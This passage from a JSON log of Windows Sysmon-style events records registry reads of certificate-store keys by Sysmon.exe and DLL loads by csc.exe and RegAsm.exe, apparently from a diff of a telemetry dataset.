"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 